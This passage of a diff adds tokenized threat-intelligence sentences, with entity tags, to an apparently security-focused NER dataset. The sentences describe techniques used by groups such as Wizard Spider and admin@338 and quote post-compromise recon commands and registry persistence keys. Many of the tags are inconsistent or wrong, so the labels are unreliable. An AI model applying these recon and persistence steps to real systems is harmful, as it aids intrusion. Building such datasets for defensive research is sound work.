"to", + "execute", + "PowerShell", + "scripts", + "to", + "download", + "malware", + "on", + "victim's", + "machines.", + "It", + "has", + "also", + "used", + "PowerShell", + "to", + "execute", + "commands", + "and", + "move", + "laterally", + "through", + "a", + "victim", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "process", + "injection", + "to", + "execute", + "payloads", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "established", + "persistence", + "via", + "the", + "Registry", + "key", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "and", + "a", + "shortcut", + "within", + "the", + "startup", + "folder." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "RDP", + "for", + "lateral", + "movement", + "and", + "to", + "deploy", + "ransomware", + "interactively." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "the", + "WebDAV", + "protocol", + "to", + "execute", + "Ryuk", + "payloads", + "hosted", + "on", + "network", + "file", + "shares." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "networkdll", + "for", + "network", + "discovery", + "and", + "psfin", + "specifically", + "for", + "financial", + "and", + "point", + "of", + "sale", + "indicators.", + "Wizard", + "Spider", + "has", + "also", + "used", + "AdFind,", + "<code>nltest/dclist</code>,", + "and", + "PowerShell", + "script", + "Get-DataInfo.ps1", + "to", + "enumerate", + "domain", + "computers,", + "including", + "the", + "domain", + "controller." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "utilized", + "`rundll32.exe`", + "to", + "deploy", + "ransomware", + "commands", + "with", + "the", + "use", + "of", + "WebDAV." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "SMB", + "to", + "drop", + "Cobalt", + "Strike", + "Beacon", + "on", + "a", + "domain", + "controller", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "scheduled", + "tasks", + "to", + "establish", + "persistence", + "for", + "TrickBot", + "and", + "other", + "malware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "acquired", + "credentials", + "from", + "the", + "SAM/SECURITY", + "registry", + "hives." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "WMI", + "to", + "identify", + "anti-virus", + "products", + "installed", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "`services.exe`", + "to", + "execute", + "scripts", + "and", + "executables", + "during", + "lateral", + "movement", + "within", + "a", + "victim's", + "network.", + "Wizard", + "Spider", + "has", + "also", + "used", + "batch", + "scripts", + "that", + "leverage", + "PsExec", + "to", + "execute", + "a", + "previously", + "transferred", + "ransomware", + "payload", + "on", + "a", + "victim's", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "taskkill.exe", + "and", + "net.exe", + "to", + "stop", + "backup,", + "catalog,", + "cloud,", + "and", + "other", + "services", + "prior", + "to", + "network", + "encryption." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "utilized", + "the", + "PowerShell", + "script", + "`Get-DataInfo.ps1`", + "to", + "collect", + "installed", + "backup", + "software", + "information", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "spearphishing", + "attachments", + "to", + "deliver", + "Microsoft", + "documents", + "containing", + "macros", + "or", + "PDFs", + "containing", + "malicious", + "links", + "to", + "download", + "either", + "Emotet,", + "Bokbot,", + "TrickBot,", + "or", + "Bazar." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "sent", + "phishing", + "emails", + "containing", + "a", + "link", + "to", + "an", + "actor-controlled", + "Google", + "Drive", + "document", + "or", + "other", + "free", + "online", + "file", + "hosting", + "services." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "Systeminfo", + "and", + "similar", + "commands", + "to", + "acquire", + "detailed", + "configuration", + "information", + "of", + "a", + "victim's", + "machine.", + "Wizard", + "Spider", + "has", + "also", + "utilized", + "the", + "PowerShell", + "cmdlet", + "`Get-ADComputer`", + "to", + "collect", + "DNS", + "hostnames,", + "last", + "logon", + "dates,", + "and", + "operating", + "system", + "information", + "from", + "Active", + "Directory." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "ipconfig", + "to", + "identify", + "the", + "network", + "configuration", + "of", + "a", + "victim", + "machine.", + "Wizard", + "Spider", + "has", + "also", + "used", + "the", + "PowerShell", + "cmdlet", + "`Get-ADComputer`", + "to", + "collect", + "IP", + "address", + "data", + "from", + "Active", + "Directory." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "\"whoami\"", + "to", + "identify", + "the", + "local", + "user", + "and", + "their", + "privileges." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "utilized", + "tools", + "such", + "as", + "Empire,", + "Cobalt", + "Strike,", + "Cobalt", + "Strike,", + "Rubeus,", + "AdFind,", + "BloodHound,", + "Metasploit,", + "Advanced", + "IP", + "Scanner,", + "Nirsoft", + "PingInfoView,", + "and", + "SoftPerfect", + "Network", + "Scanner", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "valid", + "credentials", + "for", + "privileged", + "accounts", + "with", + "the", + "goal", + "of", + "accessing", + "domain", + "controllers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "HTTP", + "for", + "network", + "communications." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "`cmd.exe`", + "to", + "execute", + "commands", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "PowerShell", + "cmdlet", + "`Invoke-WCMDump`", + "to", + "enumerate", + "Windows", + "credentials", + "in", + "the", + "Credential", + "Manager", + "in", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "the", + "icacls", + "command", + "to", + "modify", + "access", + "control", + "to", + "backup", + "servers,", + "providing", + "them", + "with", + "full", + "control", + "of", + "all", + "the", + "system", + "folders." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "WMI", + "and", + "LDAP", + "queries", + "for", + "network", + "discovery", + "and", + "to", + "move", + "laterally.", + "Wizard", + "Spider", + "has", + "also", + "used", + "batch", + "scripts", + "to", + "leverage", + "WMIC", + "to", + "deploy", + "ransomware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-OffAct", + "B-Org" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "Window", + "Remote", + "Management", + "to", + "move", + "laterally", + "through", + "a", + "victim", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "installed", + "TrickBot", + "as", + "a", + "service", + "named", + "ControlServiceA", + "in", + "order", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "established", + "persistence", + "using", + "Userinit", + "by", + "adding", + "the", + "Registry", + "key", + "HKLM\\SOFTWARE\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "Dropbox", + "for", + "C2", + "allowing", + "upload", + "and", + "download", + "of", + "files", + "as", + "well", + "as", + "execution", + "of", + "arbitrary", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "steal", + "credentials", + "from", + "installed", + "web", + "browsers", + "including", + "Microsoft", + "Internet", + "Explorer", + "and", + "Google", + "Chrome." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "the", + "AES256", + "algorithm", + "with", + "a", + "SHA1", + "derived", + "key", + "to", + "decrypt", + "exploit", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "purchased", + "domains", + "for", + "use", + "in", + "targeted", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "exfiltrated", + "files", + "via", + "the", + "Dropbox", + "API", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "exfiltrated", + "stolen", + "data", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "exploited", + "CVE-2017-0005", + "for", + "local", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "tools", + "to", + "download", + "malicious", + "files", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "malicious", + "links", + "in", + "e-mails", + "to", + "lure", + "victims", + "into", + "downloading", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "created", + "a", + "run", + "key", + "named", + "<code>Dropbox", + "Update", + "Setup</code>", + "to", + "mask", + "a", + "persistence", + "mechanism", + "for", + "a", + "malicious", + "binary." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "spoofed", + "legitimate", + "applications", + "in", + "phishing", + "lures", + "and", + "changed", + "file", + "extensions", + "to", + "conceal", + "installation", + "of", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "the", + "msiexec.exe", + "command-line", + "utility", + "to", + "download", + "and", + "execute", + "malicious", + "MSI", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "targeted", + "presidential", + "campaign", + "staffers", + "with", + "credential", + "phishing", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Org", + "I-Org", + "B-Purp", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "Python-based", + "implants", + "to", + "interact", + "with", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "query", + "the", + "Registry", + "for", + "proxy", + "settings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "created", + "a", + "Registry", + "Run", + "key", + "named", + "<code>Dropbox", + "Update", + "Setup</code>", + "to", + "establish", + "persistence", + "for", + "a", + "malicious", + "Python", + "binary." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "multi-stage", + "packers", + "for", + "exploit", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "malicious", + "links", + "in", + "e-mails", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "web", + "beacons", + "in", + "e-mails", + "to", + "track", + "hits", + "to", + "attacker-controlled", + "URL's." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "AES", + "encrypted", + "communications", + "in", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "capture", + "the", + "processor", + "architecture", + "of", + "a", + "compromised", + "host", + "in", + "order", + "to", + "register", + "it", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "enumerate", + "proxy", + "settings", + "in", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "capture", + "the", + "username", + "on", + "a", + "compromised", + "host", + "in", + "order", + "to", + "register", + "it", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "capture", + "the", + "time", + "on", + "a", + "compromised", + "host", + "in", + "order", + "to", + "register", + "it", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "GitHub", + "to", + "host", + "malware", + "linked", + "in", + "spearphishing", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZIRCONIUM", + "has", + "used", + "a", + "tool", + "to", + "open", + "a", + "Windows", + "Command", + "Shell", + "on", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "has", + "exploited", + "client", + "software", + "vulnerabilities", + "for", + "execution,", + "such", + "as", + "Microsoft", + "Word", + "CVE-2012-0158." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Exp", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "B-Features" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "commands", + "after", + "exploiting", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "obtain", + "information", + "about", + "files", + "and", + "directories:", + "<code>dir", + "c:\\", + ">>", + "%temp%\\download</code>", + "<code>dir", + "\"c:\\Documents", + "and", + "Settings\"", + ">>", + "%temp%\\download</code>", + "<code>dir", + "\"c:\\Program", + "Files\\\"", + ">>", + "%temp%\\download</code>", + "<code>dir", + "d:\\", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "commands", + "following", + "exploitation", + "of", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "enumerate", + "user", + "accounts:", + "<code>net", + "user", + ">>", + "%temp%\\download</code>", + "<code>net", + "user", + "/domain", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "command", + "following", + "exploitation", + "of", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "list", + "local", + "groups:", + "<code>net", + "localgroup", + "administrator", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "has", + "attempted", + "to", + "get", + "victims", + "to", + "launch", + "malicious", + "Microsoft", + "Word", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "command", + "to", + "rename", + "one", + "of", + "their", + "tools", + "to", + "a", + "benign", + "file", + "name:", + "<code>ren", + "\"%temp%\\upload\"", + "audiodg.exe</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "admin@338", + "has", + "sent", + "emails", + "with", + "malicious", + "Microsoft", + "Office", + "documents", + "attached." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "commands", + "after", + "exploiting", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "obtain", + "information", + "about", + "the", + "OS:", + "<code>ver", + ">>", + "%temp%\\download</code>", + "<code>systeminfo", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "command", + "after", + "exploiting", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "acquire", + "information", + "about", + "local", + "networks:", + "<code>ipconfig", + "/all", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "command", + "following", + "exploitation", + "of", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "display", + "network", + "connections:", + "<code>netstat", + "-ano", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "admin@338", + "actors", + "used", + "the", + "following", + "command", + "following", + "exploitation", + "of", + "a", + "machine", + "with", + "LOWBALL", + "malware", + "to", + "obtain", + "information", + "about", + "services:", + "<code>net", + "start", + ">>", + "%temp%\\download</code>" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Following", + "exploitation", + "with", + "LOWBALL", + "malware,", + "admin@338", + "actors", + "created", + "a", + "file", + "containing", + "a", + "list", + "of", + "commands", + "to", + "be", + "executed", + "on", + "the", + "compromised", + "computer." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "encrypted", + "files", + "and", + "information", + "before", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "compressed", + "files", + "before", + "exfiltration", + "using", + "TAR", + "and", + "RAR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "the", + "Csvde", + "tool", + "to", + "collect", + "Active", + "Directory", + "files", + "and", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "Wevtutil", + "to", + "remove", + "PowerShell", + "execution", + "logs." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "resized", + "and", + "added", + "data", + "to", + "the", + "certificate", + "table", + "to", + "enable", + "the", + "signing", + "of", + "modified", + "files", + "with", 